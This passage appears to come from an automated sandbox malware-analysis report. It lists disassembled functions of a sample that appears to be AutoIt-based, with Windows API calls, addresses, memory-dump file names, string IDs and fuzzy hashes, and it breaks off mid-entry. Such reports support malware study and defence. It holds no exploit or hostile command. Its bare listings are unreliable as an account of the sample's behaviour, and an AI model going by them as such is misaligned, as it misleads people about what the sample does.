                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                            • String ID: *.*
                                                            • API String ID: 34673085-438819550
                                                            • Opcode ID: ea1aa5fa4c80af16a3e7357810862565904733e3211910ed5ffd828ebb8e5c26
                                                            • Instruction ID: a1d60395f78a298ef58b5a2e73ca5d42adede5db1515aaa42d0fd49a660bfdb9
                                                            • Opcode Fuzzy Hash: ea1aa5fa4c80af16a3e7357810862565904733e3211910ed5ffd828ebb8e5c26
                                                            • Instruction Fuzzy Hash: E081B4715042499FCB60DFA4C8459BEB7EBBF89310F14882EF989C7351E670E945CB52
                                                            APIs
                                                              • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0071C1FC
                                                            • GetFocus.USER32 ref: 0071C20C
                                                            • GetDlgCtrlID.USER32(00000000), ref: 0071C217
                                                            • _memset.LIBCMT ref: 0071C342
                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0071C36D
                                                            • GetMenuItemCount.USER32(?), ref: 0071C38D
                                                            • GetMenuItemID.USER32(?,00000000), ref: 0071C3A0
                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0071C3D4
                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0071C41C
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0071C454
                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0071C489
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                            • String ID: 0
                                                            • API String ID: 1296962147-4108050209
                                                            • Opcode ID: 4d3c1c51d7871dbcf545c6f5601a7373c799f011b440c1cbdf8d4c43b81954aa
                                                            • Instruction ID: 799732b8c6eaae9f64b0500feced424d1d7c25cb8735384f747fe837d8444ab5
                                                            • Opcode Fuzzy Hash: 4d3c1c51d7871dbcf545c6f5601a7373c799f011b440c1cbdf8d4c43b81954aa
                                                            • Instruction Fuzzy Hash: 9B81C1701483519FD711CF98C894AEB7BE9FB88714F00892EF995972D1C778D984CB52
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 0070738F
                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0070739B
                                                            • CreateCompatibleDC.GDI32(?), ref: 007073A7
                                                            • SelectObject.GDI32(00000000,?), ref: 007073B4
                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00707408
                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00707444
                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00707468
                                                            • SelectObject.GDI32(00000006,?), ref: 00707470
                                                            • DeleteObject.GDI32(?), ref: 00707479
                                                            • DeleteDC.GDI32(00000006), ref: 00707480
                                                            • ReleaseDC.USER32(00000000,?), ref: 0070748B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                            • String ID: (
                                                            • API String ID: 2598888154-3887548279
                                                            • Opcode ID: b3e35d98caaec32c579f3aa3f27765bceb8f22e0637ef04a756d10cf732a9e86
                                                            • Instruction ID: 96e9d1582b28263435fb2a2219ca394170c94a4ad294c1d9292b77c36d9707df
                                                            • Opcode Fuzzy Hash: b3e35d98caaec32c579f3aa3f27765bceb8f22e0637ef04a756d10cf732a9e86
                                                            • Instruction Fuzzy Hash: 77514771904209EFDB14CFA8CC84EAEBBB9EF48310F14C52DF95AA7291C735A940CB54
                                                            APIs
                                                              • Part of subcall function 006B0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00696B0C,?,00008000), ref: 006B0973
                                                              • Part of subcall function 00694750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00694743,?,?,006937AE,?), ref: 00694770
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00696BAD
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00696CFA
                                                              • Part of subcall function 0069586D: _wcscpy.LIBCMT ref: 006958A5
                                                              • Part of subcall function 006B363D: _iswctype.LIBCMT ref: 006B3645
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                            • API String ID: 537147316-1018226102
                                                            • Opcode ID: 94606447ad55067e56b87db86f878b49b0f27e9750717f2f1caf58cb8ea90534
                                                            • Instruction ID: 65b33615549b7d92f165792a046ac0eb2457ee9a376fccdca293a36cc405bc04
                                                            • Opcode Fuzzy Hash: 94606447ad55067e56b87db86f878b49b0f27e9750717f2f1caf58cb8ea90534
                                                            • Instruction Fuzzy Hash: 3902AB701083419FCB64EF24C881AAFBBFAEF94314F10491DF49A976A1DB31DA49CB56
                                                            APIs
                                                            • _memset.LIBCMT ref: 006F2D50
                                                            • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 006F2DDD
                                                            • GetMenuItemCount.USER32(00755890), ref: 006F2E66
                                                            • DeleteMenu.USER32(00755890,00000005,00000000,000000F5,?,?), ref: 006F2EF6
                                                            • DeleteMenu.USER32(00755890,00000004,00000000), ref: 006F2EFE
                                                            • DeleteMenu.USER32(00755890,00000006,00000000), ref: 006F2F06
                                                            • DeleteMenu.USER32(00755890,00000003,00000000), ref: 006F2F0E
                                                            • GetMenuItemCount.USER32(00755890), ref: 006F2F16
                                                            • SetMenuItemInfoW.USER32(00755890,00000004,00000000,00000030), ref: 006F2F4C
                                                            • GetCursorPos.USER32(?), ref: 006F2F56
                                                            • SetForegroundWindow.USER32(00000000), ref: 006F2F5F
                                                            • TrackPopupMenuEx.USER32(00755890,00000000,?,00000000,00000000,00000000), ref: 006F2F72
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006F2F7E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                            • String ID:
                                                            • API String ID: 3993528054-0
                                                            • Opcode ID: 936532aa7ba25d8fe8f871c224a2f4aa3545b2593de0296866ca5001f91bd827
                                                            • Instruction ID: 4bbd2a1295ed3ef8cf06cd017b334d15a3b766f895faf704b213740ed97312ff
                                                            • Opcode Fuzzy Hash: 936532aa7ba25d8fe8f871c224a2f4aa3545b2593de0296866ca5001f91bd827
                                                            • Instruction Fuzzy Hash: 1771C17064120ABAEB218F58DC65FFABF66FF04324F204216F715AA2E1C7715860DF54
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 007088D7
                                                            • CoInitialize.OLE32(00000000), ref: 00708904
                                                            • CoUninitialize.OLE32 ref: 0070890E
                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00708A0E
                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00708B3B
                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00722C0C), ref: 00708B6F
                                                            • CoGetObject.OLE32(?,00000000,00722C0C,?), ref: 00708B92
                                                            • SetErrorMode.KERNEL32(00000000), ref: 00708BA5
                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00708C25
                                                            • VariantClear.OLEAUT32(?), ref: 00708C35
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                            • String ID: ,,r
                                                            • API String ID: 2395222682-1227627816
                                                            • Opcode ID: 513502b0e872a681ba1402a31d11eeadf5bebce536bbb4dca36416658fc999cb
                                                            • Instruction ID: abbc1edb5fc3d0ead0f77906513f30a4965b95c48fffe8438c3fc2ecfc0c025f
                                                            • Opcode Fuzzy Hash: 513502b0e872a681ba1402a31d11eeadf5bebce536bbb4dca36416658fc999cb
                                                            • Instruction Fuzzy Hash: 1AC113B1208305EFD740DF28C88496AB7E9AF89358F004A5DF9899B291DB75ED05CB62
                                                            APIs
                                                              • Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06
                                                            • _memset.LIBCMT ref: 006E786B
                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006E78A0
                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006E78BC
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006E78D8
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 006E7902
                                                            • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 006E792A
                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 006E7935
                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 006E793A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                            • API String ID: 1411258926-22481851
                                                            • Opcode ID: 4952a32bde3bcd0261ea60df205d349a653f35eafc69e2f3420180ac4aef0caf
                                                            • Instruction ID: 1d2165b98803a04196f6e6e049da20a2671fff929440a5b82e09563560e99e78
                                                            • Opcode Fuzzy Hash: 4952a32bde3bcd0261ea60df205d349a653f35eafc69e2f3420180ac4aef0caf
                                                            • Instruction Fuzzy Hash: 5141F872C14629ABDF15EFA4DC85DEEB779FF14310F448069E905A32A1EB349E04CB94
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0070FDAD,?,?), ref: 00710E31
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                            • API String ID: 3964851224-909552448
                                                            • Opcode ID: 26db56d21e6b36a615b918dcc5aef77f2b3eb7676e5d3a143d1335e5fd00bf4e
                                                            • Instruction ID: 6d3901f276abb10d17eb9cfd93aeaa12bb5c024391e7501d7b862a712c08b5db
                                                            • Opcode Fuzzy Hash: 26db56d21e6b36a615b918dcc5aef77f2b3eb7676e5d3a143d1335e5fd00bf4e
                                                            • Instruction Fuzzy Hash: 5D416B7111028A8BDF50EF18D856AEF3769BF11310F244829FC551B2D2DBB89DDACBA0
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,006CE2A0,00000010,?,Bad directive syntax error,0071F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 006EF7C2
                                                            • LoadStringW.USER32(00000000,?,006CE2A0,00000010), ref: 006EF7C9
                                                              • Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22
                                                            • _wprintf.LIBCMT ref: 006EF7FC
                                                            • __swprintf.LIBCMT ref: 006EF81E
                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 006EF88D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                            • API String ID: 1506413516-4153970271
                                                            • Opcode ID: a57fa8fd90bd1294f931162057cce54efdbd5ef511b9102152927776610fed42
                                                            • Instruction ID: cd29c5ea97cb59f891fcf2cd30c69d156c3c09089ee7ba7d0d53da4f2e6baa16
                                                            • Opcode Fuzzy Hash: a57fa8fd90bd1294f931162057cce54efdbd5ef511b9102152927776610fed42
                                                            • Instruction Fuzzy Hash: B621AC7290021EEFCF42EF90CC0AEEE773ABF18300F00446AF505660A2EA71A618DB55
                                                            APIs
                                                              • Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06
                                                              • Part of subcall function 00697924: _memmove.LIBCMT ref: 006979AD
                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 006F5330
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 006F5346
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006F5357
                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 006F5369
                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 006F537A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: SendString$_memmove
                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                            • API String ID: 2279737902-1007645807
                                                            • Opcode ID: 16d1c3c67371460fcacc3436dc2764fb4f8bfd2ba6319e8b10c72e54fc824caf
                                                            • Instruction ID: 06c4e08b95c685e8d44b9cf8519adb70b21b51fcaea9c4dced27f2efb608d708
                                                            • Opcode Fuzzy Hash: 16d1c3c67371460fcacc3436dc2764fb4f8bfd2ba6319e8b10c72e54fc824caf
                                                            • Instruction Fuzzy Hash: 6411C471AA412DB9DBA0B7B5DC5ADFF7BBDEB91B50F000429B502A20D1EEA00D05C5A6
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 208665112-3771769585
                                                            • Opcode ID: 0bd0843b7bb6472041933bf0b1e0cb9a812aa29bd9bc169b67f15b205e428105
                                                            • Instruction ID: d38f7ddc6029ed73a7c9c8113eae4d5c2dee5fba01b2893fb8f5de572466b27c
                                                            • Opcode Fuzzy Hash: 0bd0843b7bb6472041933bf0b1e0cb9a812aa29bd9bc169b67f15b205e428105
                                                            • Instruction Fuzzy Hash: FA110271504109AFDB60BB349C4AEEB77BDEF02321F0481BAF64592192EF759AC18B54
                                                            APIs
                                                            • timeGetTime.WINMM ref: 006F4F7A
                                                              • Part of subcall function 006B049F: timeGetTime.WINMM(?,75A8B400,006A0E7B), ref: 006B04A3
                                                            • Sleep.KERNEL32(0000000A), ref: 006F4FA6
                                                            • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 006F4FCA
                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 006F4FEC
                                                            • SetActiveWindow.USER32 ref: 006F500B
                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 006F5019
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 006F5038
                                                            • Sleep.KERNEL32(000000FA), ref: 006F5043
                                                            • IsWindow.USER32 ref: 006F504F
                                                            • EndDialog.USER32(00000000), ref: 006F5060
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                            • String ID: BUTTON
                                                            • API String ID: 1194449130-3405671355
                                                            • Opcode ID: 1bfd43519430ec827b00ca6c95bdad13629b6a5095e44e80f1e17ac58bb9b729
                                                            • Instruction ID: 5de80087dbbf708dc0ccd063cc5c38832d99634fc8db7eb1e20b0e9d3600254e
                                                            • Opcode Fuzzy Hash: 1bfd43519430ec827b00ca6c95bdad13629b6a5095e44e80f1e17ac58bb9b729
                                                            • Instruction Fuzzy Hash: E321C5B0241709AFE7115F24EC89AF63B6AEB45746F04D028F206822F1DFB94D608B69
                                                            APIs
                                                              • Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
                                                              • Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC
                                                            • CoInitialize.OLE32(00000000), ref: 006FD5EA
                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006FD67D
                                                            • SHGetDesktopFolder.SHELL32(?), ref: 006FD691
                                                            • CoCreateInstance.OLE32(00722D7C,00000000,00000001,00748C1C,?), ref: 006FD6DD
                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006FD74C
                                                            • CoTaskMemFree.OLE32(?,?), ref: 006FD7A4
                                                            • _memset.LIBCMT ref: 006FD7E1
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 006FD81D
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006FD840
                                                            • CoTaskMemFree.OLE32(00000000), ref: 006FD847
                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 006FD87E
                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 006FD880
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                            • String ID:
                                                            • API String ID: 1246142700-0
                                                            • Opcode ID: bd806b524b6e320ecd8b817b17c96ce9670c2f0ec6e6471c87925fa7813f94a7
                                                            • Instruction ID: 08cf8d2e6b19ad8d00366a892772640221627f03acae30a05be51cf7ff6fe14f
                                                            • Opcode Fuzzy Hash: bd806b524b6e320ecd8b817b17c96ce9670c2f0ec6e6471c87925fa7813f94a7
                                                            • Instruction Fuzzy Hash: 03B1EC75A00109AFDB44DFA8C885DAEBBBAFF49314F1484A9F909DB261DB30ED41CB54
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000001), ref: 006EC283
                                                            • GetWindowRect.USER32(00000000,?), ref: 006EC295
                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 006EC2F3
                                                            • GetDlgItem.USER32(?,00000002), ref: 006EC2FE
                                                            • GetWindowRect.USER32(00000000,?), ref: 006EC310
                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 006EC364
                                                            • GetDlgItem.USER32(?,000003E9), ref: 006EC372
                                                            • GetWindowRect.USER32(00000000,?), ref: 006EC383
                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 006EC3C6
                                                            • GetDlgItem.USER32(?,000003EA), ref: 006EC3D4
                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 006EC3F1
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 006EC3FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
